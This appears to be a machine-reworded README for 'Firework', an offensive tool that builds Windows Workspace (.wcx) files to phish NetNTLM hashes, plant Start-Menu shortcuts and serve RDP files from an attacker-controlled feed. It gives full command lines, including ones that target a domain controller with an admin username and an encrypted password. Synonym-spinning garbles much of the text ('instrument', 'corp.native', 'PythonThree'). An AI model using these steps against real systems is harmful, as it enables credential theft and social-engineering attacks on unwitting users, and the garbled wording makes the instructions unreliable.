- Phish for credentials – NetNTLM hashes can be despatched if a consumer enters their credentials (or on older variations of Windows mechanically).
- Add objects to the Start-Menu – After set-up shortcuts are added to the Start-Menu which launch the served RDP file(s). These entries might doubtlessly be used as a part of a wider social engineering marketing campaign.
- Download sources – Resources such because the .rdp recordsdata and icon recordsdata are downloaded and up to date by Windows on a every day foundation (if authentication of the feed is disabled or is happy).
Read the SpiderLabs weblog for a extra detailed abstract and stroll by means of.
- Tested with Python 2.7.x. (PythonThree not at the moment supported, though the primary Firework class may very well be used in Python 3)
$ pip set up -r necessities.txt
- The instrument serves content material over HTTPS and requires a certificates and personal key to make use of in-constructed net server with NetNTLM seize. Default recordsdata: cert.crt and key.pem
.-:::::'::::::::::.. .,::::::.:: . .::: ... :::::::.. ::: . ;;;'''' ;;;;;;;``;;;; ;;;;''''';;, ;; ;;;'.;;;;;;;. ;;;;``;;;; ;;; .;;,. [[[,,== [[[ [[[,/[[[' [[cccc '[[, [[, [[',[[ [[,[[[,/[[[' [[[[[/' `$$$"`` $$$ $$$$$$c $$"""" Y$c$$$c$P $$$, $$$$$$$$$c _$$$$, 888 888 888b "88bo,888oo,__ "88"888 "888,_ _,88P888b "88bo,"888"88o, "MM, MMM MMMM "W" """"YUMMM "M "M" "YMMMMMP" MMMM "W" MMM "MMP" utilization: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN] [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH] [-t CERT] [-k KEY] WCX office instrument non-obligatory arguments: -h, --help present this assist message and exit -c COMPANY, --company COMPANY Company identify -u URL, --url URL Feed URL -a APP, --app APP App Name -e EXT, --ext EXT App Extension -i ICON, --icon ICON App Icon -l LISTEN, --listen LISTEN TLS Web Server Port -r RDP, --rdp RDP RDP Server -d DOMAIN, --domain DOMAIN RDP Domain -n USERNAME, --username USERNAME RDP Username -p PASSWORD, --password PASSWORD RDP Password -t CERT, --cert CERT SSL cert -k KEY, --key KEY SSL key
- Organisation Name: EvilCorp
- URL to feed XML (or URL to Firework’s in-constructed server): https://example.org/ – This is the place Windows downloads the feed from.
- Application Name: Firework
- File Extension: .fwk
- Icon File: firework.ico
python ./firework.py -c EvilCorp -u https://instance.org/ -a Firework -e .fwk -i ./firework.ico
In constructed net server will begin on port 443 if cert.crt and key.pem are current in present listing. This will power an NTLM problem with responder. If these recordsdata usually are not current the instrument will write all recordsdata to native listing in your personal internet hosting.
If you want to begin the in-constructed net server on alternate port use the -l flag as under:
python ./firework.py -c EvilCorp -u https://instance.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
You may also add some customisations to the .rdp file that will get served.
- Remote Desktop Server: dc.corp.native
- Domain: corp.native
- Username: admin
- Password Crypt: Encrypted password that will get included in RDP file
Note: Passwords saved in .rdp recordsdata are probably ignored in a default config.
python ./firework.py -c EvilCorp -u https://instance.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.native -d corp.native -n admin -p <crypt password>
Having run the instrument ‘payload.wcx’ can be written to present listing. This file is what when clicked on begins the provisioning course of.